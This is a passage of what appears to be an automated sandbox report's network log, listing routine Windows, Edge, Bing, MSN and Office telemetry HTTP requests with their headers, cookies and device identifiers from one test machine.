t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAeDShYGeY6BNP1ScXi6W2D+IcaU8wV9Tuj8PYSPb5rw3nRJxxG0T76NdL1T3kuTHMVyrszjczE1q5d0PyFwxq43mB3oxpmnV0Ws0i/S7kGicbfCaIt1Sqt6uttl7Yc9eO9HTL+jJI6cxYQXaUDYmlmP/zqTRhgJGmWM3BDkDrZiIhoDyqB0ujJO/aP5rLJPC8p8Ih4PowJv1qgT6pKBsdjMvyxxj0n+EB2kw9cX3e8Pvv3QmRL+Btst1elImxKxREWbySKYSJPeNXCFYLZNzyqdxhU82Uqqr00VNCbbPWk4LpDxHTm7tSSJzdPOzqr/N+pEJWjCocEabbsDIiCx4D5IQZgAAEHzRduvFiIz/rfE2nN5AXluwAQW39g4dOMHKfdu5m0rfYbcpms75Li4UtSWzIYVPEDhkLoZU6yfBKZkUgcrvkjEL3m1qNsrhvVeMlx1CP9vDg6j22VpQ0/uvtzk0D7cRko4yMqfL/XCLt0cCdsFInMqLc+RfVkO8+lyerZhDN6Zav5e2ThR5RUWXbArw6Kyk4AlcoJ4IAKli8GoYZQF9/kjW+7Ts2gcx4oDWo9KbCGfvxQp/cl1SVF123v1QRulee5/Kd6w4knzhQ2OLPdVqEUCHt5TQO2V+L1lz51Kicz/d+lxDhjiXK0BbQCOA8d0CRhWFyT7rSVuePy9B22re6wlPjMWifLNDPpo/CZn1TDpAg+MXRrfbXV1GhwnZ5XeGSTKWczZ3H8p9hb5CKcXrFwESUR59atbJrFSje3jtYUxCMXvpsQk9dTQIiB+qN+gQbbeykSiEa+r65Ebhum08v88TXCsZKjP1w+PdMl0Adgyd2wUa+9pcOXTE9sT+3Z8wCJ1feiDA5k1F4yRoZNoJF2v4DCMfKNqTvIotWhAmwPdmkIYXw1l2aDYfqHyGvesIiWkPz9LRtm7ZHEGnDWqXQT+UTNcB&p=Cache-Control: no-cacheMS-CV: y7MCjIAgcU2SEYAx.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241125T232545Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=d4db4a4df9bf4405a59081ccfdb0fb26&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=601507&metered=false&nettype=ethernet&npid=sc-338388&oemName=jaryaj%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=jaryaj20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=601507&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: cid=531538185&chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAeDShYGeY6BNP1ScXi6W2D+IcaU8wV9Tuj8PYSPb5rw3nRJxxG0T76NdL1T3kuTHMVyrszjczE1q5d0PyFwxq43mB3oxpmnV0Ws0i/S7kGicbfCaIt1Sqt6uttl7Yc9eO9HTL+jJI6cxYQXaUDYmlmP/zqTRhgJGmWM3BDkDrZiIhoDyqB0ujJO/aP5rLJPC8p8Ih4PowJv1qgT6pKBsdjMvyxxj0n+EB2kw9cX3e8Pvv3QmRL+Btst1elImxKxREWbySKYSJPeNXCFYLZNzyqdxhU82Uqqr00VNCbbPWk4LpDxHTm7tSSJzdPOzqr/N+pEJWjCocEabbsDIiCx4D5IQZgAAEHzRduvFiIz/rfE2nN5AXluwAQW39g4dOMHKfdu5m0rfYbcpms75Li4UtSWzIYVPEDhkLoZU6yfBKZkUgcrvkjEL3m1qNsrhvVeMlx1CP9vDg6j22VpQ0/uvtzk0D7cRko4yMqfL/XCLt0cCdsFInMqLc+RfVkO8+lyerZhDN6Zav5e2ThR5RUWXbArw6Kyk4AlcoJ4IAKli8GoYZQF9/kjW+7Ts2gcx4oDWo9KbCGfvxQp/cl1SVF123v1QRulee5/Kd6w4knzhQ2OLPdVqEUCHt5TQO2V+L1lz51Kicz/d+lxDhjiXK0BbQCOA8d0CRhWFyT7rSVuePy9B22re6wlPjMWifLNDPpo/CZn1TDpAg+MXRrfbXV1GhwnZ5XeGSTKWczZ3H8p9hb5CKcXrFwESUR59atbJrFSje3jtYUxCMXvpsQk9dTQIiB+qN+gQbbeykSiEa+r65Ebhum08v88TXCsZKjP1w+PdMl0Adgyd2wUa+9pcOXTE9sT+3Z8wCJ1feiDA5k1F4yRoZNoJF2v4DCMfKNqTvIotWhAmwPdmkIYXw1l2aDYfqHyGvesIiWkPz9LRtm7ZHEGnDWqXQT+UTNcB&p=Cache-Control: no-cacheMS-CV: y7MCjIAgcU2SEYAx.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239337201808_1NREAF5SJS6TG8GUU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239378034177_1Y8HUQR0O0JRMMA4L&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239402415504_17DDWI2WCHUD2N4TB&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239402415503_1IET5OVL073FDA0RX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239378034176_1VAY6I95TXDSQZZRC&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241125T232546Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=755262e59a394e14894dac9a9c058398&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=601507&metered=false&nettype=ethernet&npid=sc-338387&oemName=jaryaj%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&sc-mode=0&scmid=Public&smBiosDm=jaryaj20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=601507&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: cid=531098720,531174684,532365230&chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAeDShYGeY6BNP1ScXi6W2D+IcaU8wV9Tuj8PYSPb5rw3nRJxxG0T76NdL1T3kuTHMVyrszjczE1q5d0PyFwxq43mB3oxpmnV0Ws0i/S7kGicbfCaIt1Sqt6uttl7Yc9eO9HTL+jJI6cxYQXaUDYmlmP/zqTRhgJGmWM3BDkDrZiIhoDyqB0ujJO/aP5rLJPC8p8Ih4PowJv1qgT6pKBsdjMvyxxj0n+EB2kw9cX3e8Pvv3QmRL+Btst1elImxKxREWbySKYSJPeNXCFYLZNzyqdxhU82Uqqr00VNCbbPWk4LpDxHTm7tSSJzdPOzqr/N+pEJWjCocEabbsDIiCx4D5IQZgAAEHzRduvFiIz/rfE2nN5AXluwAQW39g4dOMHKfdu5m0rfYbcpms75Li4UtSWzIYVPEDhkLoZU6yfBKZkUgcrvkjEL3m1qNsrhvVeMlx1CP9vDg6j22VpQ0/uvtzk0D7cRko4yMqfL/XCLt0cCdsFInMqLc+RfVkO8+lyerZhDN6Zav5e2ThR5RUWXbArw6Kyk4AlcoJ4IAKli8GoYZQF9/kjW+7Ts2gcx4oDWo9KbCGfvxQp/cl1SVF123v1QRulee5/Kd6w4knzhQ2OLPdVqEUCHt5TQO2V+L1lz51Kicz/d+lxDhjiXK0BbQCOA8d0CRhWFyT7rSVuePy9B22re6wlPjMWifLNDPpo/CZn1TDpAg+MXRrfbXV1GhwnZ5XeGSTKWczZ3H8p9hb5CKcXrFwESUR59atbJrFSje3jtYUxCMXvpsQk9dTQIiB+qN+gQbbeykSiEa+r65Ebhum08v88TXCsZKjP1w+PdMl0Adgyd2wUa+9pcOXTE9sT+3Z8wCJ1feiDA5k1F4yRoZNoJF2v4DCMfKNqTvIotWhAmwPdmkIYXw1l2aDYfqHyGvesIiWkPz9LRtm7ZHEGnDWqXQT+UTNcB&p=Cache-Control: no-cacheMS-CV: y7MCjIAgcU2SEYAx.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /b?rn=1732577146766&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0675AFABBF8562701E27BAE9BE8263C5&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1732577146765&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a83a3db270ec46f296fce94d1b2a9496&activityId=a83a3db270ec46f296fce94d1b2a9496&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=0675AFABBF8562701E27BAE9BE8263C5; _EDGE_S=F=1&SID=289DED71267C6C8C1A3EF83327A06D4B; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=0675AFABBF8562701E27BAE9BE8263C5&ACHANNEL=4&ABUILD=117.0.5938.150&clr=esdk&edgeid=5518710994624701133&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308\|10837393&bcnt=1\|1&asid=a5f4f3d592b04007d4765a3693f878c1 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=0675AFABBF8562701E27BAE9BE8263C5; _EDGE_S=F=1&SID=289DED71267C6C8C1A3EF83327A06D4B; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msySs.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1u24yb.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /b2?rn=1732577146766&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0675AFABBF8562701E27BAE9BE8263C5&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1E763f68b32d41d689280de1732577149; XID=1E763f68b32d41d689280de1732577149
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=0675AFABBF8562701E27BAE9BE8263C5&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.150&clr=esdk&edgeid=5518710994624701133&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=4d6188d991f34dbfd50468dabb62ef6a HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0675AFABBF8562701E27BAE9BE8263C5; _EDGE_S=F=1&SID=289DED71267C6C8C1A3EF83327A06D4B; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239402613045_1Y7ZSJRVESY5KBVS8&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239402613046_1VJ8MQN6OLRO0EVHP&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
